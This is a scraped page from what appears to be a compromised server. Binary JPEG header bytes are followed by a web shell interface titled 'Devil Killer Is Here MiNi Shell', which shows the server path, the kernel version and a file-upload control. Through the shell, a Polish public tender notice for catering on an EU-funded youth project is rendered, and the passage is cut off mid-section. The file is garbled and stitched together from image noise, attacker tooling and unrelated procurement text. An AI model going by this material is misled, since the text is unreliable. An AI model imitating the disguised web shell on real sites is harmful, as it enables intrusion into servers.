JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250813/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250813/0037487301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Catering sukcesywny dla uczestników projektu &#34;Podkarpacka Inicjatywa Alma - europejskie mobilności młodych&#34; - 6 części. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rzeszowska Agencja Rozwoju Regionalnego Spółka Akcyjna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690260330</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Szopena 51</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-959</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 8676240, 17 8676260</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@rarr.rzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rarr.rzeszow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Sprawy gospodarcze i finansowe</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Catering sukcesywny dla uczestników projektu &#34;Podkarpacka Inicjatywa Alma - europejskie mobilności młodych&#34; - 6 części. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-89d73d25-914b-4ed0-b916-874842ef8e71</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00374873</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-08-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych”. Nazwa programu: Fundusze Europejskie dla Podkarpacia 2021-2027, Priorytet 7 Kapitał ludzki gotowy do zmian, Działanie 7.5 Inicjatywa ALMA. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1154770 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl pod adresem strony internetowej, na której jest prowadzone postępowanie i na której będą dostępne wszelkie dokumenty związane z prowadzoną procedurą: https://platformazakupowa.pl/transakcja/1154770.<br/>2. Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania określonym przez Zamawiającego tj. DA.2611.39.2025 i nazwą zadania: catering sukcesywny dla uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – (6 części).<br/>2. Postępowanie prowadzone jest w języku polskim za pośrednictwem platformazakupowa.pl pod adresem strony internetowej, na której jest prowadzone postępowanie i na której będą dostępne wszelkie dokumenty związane z prowadzoną procedurą:<br/>https://platformazakupowa.pl/transakcja/1154770.<br/>3. Zamawiający nie dopuszcza składania wniosków, oświadczeń i innych informacji telefonicznie.<br/>4. Wszelkie wyjaśnienia oraz zmiany treści SWZ oraz inne dokumenty zamówienia bezpośrednio związane z przedmiotowym postępowaniem będą zamieszczane na stronie internetowej prowadzonego postępowania https://platformazakupowa.pl/transakcja/1154770.<br/>5. Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>6. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują:<br/>1) wyłącznie poprzez Platformę Zakupową i komunikaty publiczne oraz prywatne, dostępną pod adresem: https://platformazakupowa.pl/transakcja/1154770,<br/>2) lub w przypadku awarii powyższego: drogą elektroniczną: na adres mailowy zamowienia.publiczne@rarr.rzeszow.pl ,<br/>3) z zastrzeżeniem że ofertę Wykonawca może złożyć wyłącznie za pośrednictwem Platformy Zakupowej.<br/>7. Zamawiający w zakresie pytań technicznych związanych z działaniem systemu wskazuje kontakt z Centrum Wsparcia Klienta platformazakupowa.pl , pod numer tel.: +48 (22) 101 02 02, cwk@platformazakupowa.pl .<br/>8. Szczegółowe informacje zawiera Rozdział XIII i XIV SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/transakcja/1154770</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Państwa danych osobowych w rozumieniu Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE („RODO”) jest: Rzeszowska Agencja Rozwoju Regionalnego S.A. ul. Szopena 51, 35-959 Rzeszów, e-mail: sekretariat@rarr.rzeszow.pl.<br/>2. W sprawach związanych z Państwa danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, wysyłając e-mail na adres: iod@rarr.rzeszow.pl.<br/>3. Zamawiający realizuje obowiązek informacyjny przez zamieszczenie wymaganych informacji w dokumentach postępowania (SWZ). Klauzula informacyjna dotycząca przetwarzania danych osobowych znajduje się w Rozdziale XXV SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">A. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c) RODO w celu związanym z prowadzeniem postępowania o udzielenie zamówienia publicznego pod nazwą Catering sukcesywny dla Uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – (6 części), znak sprawy DA.2611.39.2025 oraz jego rozstrzygnięcia, jak również zawarcia umowy w sprawie zamówienia publicznego jej realizacji oraz rozliczenia finansowego, a także udokumentowania postępowania o udzielenie zamówienia publicznego i jego archiwizacji.<br/>B. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (t.j. Dz. U. z 2024 r. poz. 1320), dalej „ustawa Pzp”, podmioty świadczące na rzecz Administratora usługi prawne, informatyczne, księgowo-finansowe, kurierskie i pocztowe oraz inne, z którymi Administrator zawrze umowy powierzenia przetwarzania danych osobowych, a także OPEN NEXUS SP. z o.o., jako właściciel platformy zakupowej, na której Administrator prowadzi postępowania o udzielenia zamówienia publicznego, działając pod adresem https://platformazakupowa.pl/ .<br/>C. Zamawiający realizuje obowiązek informacyjny przez zamieszczenie wymaganych informacji w dokumentach postępowania (SWZ). Klauzula informacyjna dotycząca przetwarzania danych osobowych znajduje się w Rozdziale XXV SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DA.2611.39.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zapewnienie usługi cateringowej: przygotowania, dostarczenia i wydania posiłków w formie: przerwy kawowej oraz jednodaniowego lunchu dla Uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – biorących udział w 30-dniowym cyklu kursów i szkoleń.<br/>2. Usługa realizowana będzie sukcesywnie i adekwatnie do prowadzonych naborów uczestników projektu i realizowanych dla nich działań szkoleniowych.<br/>3. Usługa realizowana będzie w dni robocze, wyłączając dni ustawowo wolne od pracy, średnio dwa razy w tygodniu przez 30 dni roboczych dla jednej grupy szkoleniowej.<br/>4. Dokładny termin i adres realizacji szkolenia, a tym samym cateringu, będzie podawany każdorazowo przez Zamawiającego na maksymalnie 7 dni przed datą rozpoczęcia szkolenia.<br/>5. Godziny dostarczenia posiłków zostaną każdorazowo, na bieżąco uzgodnione z Wykonawcą z minimalnie 2-dniowym wyprzedzeniem.<br/>6. Realizacja zamówienia będzie sukcesywnie rozłożona w czasie w okresie realizacji projektu tj. od dnia podpisania umowy z Wykonawcą przez kolejnych 15 miesięcy kalendarzowych.<br/>7. Maksymalna liczba cateringów to 1080 szt.<br/>8. Usługa będzie realizowana na terenie miasta Rzeszowa.<br/>9. Informacja o wymaganiach obejmujących aspekty gospodarcze, środowiskowe, społeczne, związane z innowacyjnością, zatrudnieniem lub zachowaniem poufności informacji - art. 96 Pzp: Zamawiający ma szczególne wymagania w tym zakresie. Szczególne wymagania są określone w Opisie przedmiotu zamówienia (Załącznik nr 1 do swz) w rozdziale VI Opz aspekty środowiskowe z art. 96 ust. 2 pkt 1 Pzp i rozdziale VII Opz aspekty społeczne z art. 96 ust. 2 pkt 2 Pzp.<br/>10. Szczegółowy opis oraz sposób realizacji zamówienia określa:<br/>Załącznik nr 1 do SWZ - Opis przedmiotu zamówienia<br/>Załącznik nr 2 do SWZ – Wzór umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty nie podlegające odrzuceniu oceniane będą według kryteriów opisanych niżej.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Kryterium: Cena – waga 70 %.<br/>2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art.96 ust. 2 pkt 2 ustawy Pzp - waga 30 %.<br/><br/>Ad. 1) Kryterium: Cena – waga 70 %.<br/>W tym kryterium można otrzymać najwięcej 70 punktów.<br/>Liczba punktów w kryterium zostanie przyznana zgodnie z poniższym wzorem:<br/><br/>Najniższa cena spośród ofert niepodlegających odrzuceniu<br/>---------------------------------------------------------------------------------------- X 70 % x 100 = ….… pkt<br/>Cena badanej oferty brutto<br/><br/>Ad. 2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2) ustawy Pzp - waga 30 %.<br/>W tym kryterium można otrzymać najwięcej 30 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznania w następujący sposób:<br/>Jeżeli Wykonawca na czas realizacji przedmiotu zamówienia zatrudni do obsługi przedmiotu zamówienia na podstawie umowy o pracę lub umowy cywilno-prawnej:<br/>a) 2 lub więcej osób wymienionych w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 30 punktów,<br/>b) 1 osobę wymienioną w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 15 punktów,<br/>c) Jeżeli Wykonawca nie zatrudni żadnej osoby wymienionej w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust.2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zapewnienie usługi cateringowej: przygotowania, dostarczenia i wydania posiłków w formie: przerwy kawowej oraz jednodaniowego lunchu dla Uczestników Projektu „Podkarpacka Inicjatywa ALMA – europejskie mobilności młodych” – biorących udział w 30-dniowym cyklu kursów i szkoleń.<br/>2. Usługa realizowana będzie sukcesywnie i adekwatnie do prowadzonych naborów uczestników projektu i realizowanych dla nich działań szkoleniowych.<br/>3. Usługa realizowana będzie w dni robocze, wyłączając dni ustawowo wolne od pracy, średnio dwa razy w tygodniu przez 30 dni roboczych dla jednej grupy szkoleniowej.<br/>4. Dokładny termin i adres realizacji szkolenia, a tym samym cateringu, będzie podawany każdorazowo przez Zamawiającego na maksymalnie 7 dni przed datą rozpoczęcia szkolenia.<br/>5. Godziny dostarczenia posiłków zostaną każdorazowo, na bieżąco uzgodnione z Wykonawcą z minimalnie 2-dniowym wyprzedzeniem.<br/>6. Realizacja zamówienia będzie sukcesywnie rozłożona w czasie w okresie realizacji projektu tj. od dnia podpisania umowy z Wykonawcą przez kolejnych 15 miesięcy kalendarzowych.<br/>7. Maksymalna liczba cateringów to 1080 szt.<br/>8. Usługa będzie realizowana na terenie miasta Przemyśl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55520000-1 - Usługi dostarczania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55321000-6 - Usługi przygotowywania posiłków</p> <p class="mb-0">55320000-9 - Usługi podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">15 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wszystkie oferty nie podlegające odrzuceniu oceniane będą według kryteriów opisanych niżej.<br/>Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Kryterium: Cena – waga 70 %.<br/>2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art.96 ust. 2 pkt 2 ustawy Pzp - waga 30 %.<br/><br/>Ad. 1) Kryterium: Cena – waga 70 %.<br/>W tym kryterium można otrzymać najwięcej 70 punktów.<br/>Liczba punktów w kryterium zostanie przyznana zgodnie z poniższym wzorem:<br/>Najniższa cena spośród ofert niepodlegających odrzuceniu<br/>---------------------------------------------------------------------------------------- X 70 % x 100 = ….… pkt<br/>Cena badanej oferty brutto<br/><br/>Ad. 2) Kryterium: Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust. 2 pkt 2) ustawy Pzp - waga 30 %.<br/>W tym kryterium można otrzymać najwięcej 30 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznania w następujący sposób:<br/>Jeżeli Wykonawca na czas realizacji przedmiotu zamówienia zatrudni do obsługi przedmiotu zamówienia na podstawie umowy o pracę lub umowy cywilno-prawnej:<br/>a) 2 lub więcej osób wymienionych w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 30 punktów,<br/>b) 1 osobę wymienioną w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 15 punktów,<br/>c) Jeżeli Wykonawca nie zatrudni żadnej osoby wymienionej w katalogu z art. 96 ust. 2 pkt 2 ustawy Pzp – oferta otrzyma 0 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zatrudnienie przez wykonawcę osoby lub osób wymienionych w katalogu określonym w art. 96 ust.2 pkt 2 ustawy Pzp</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty środowiskowe</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 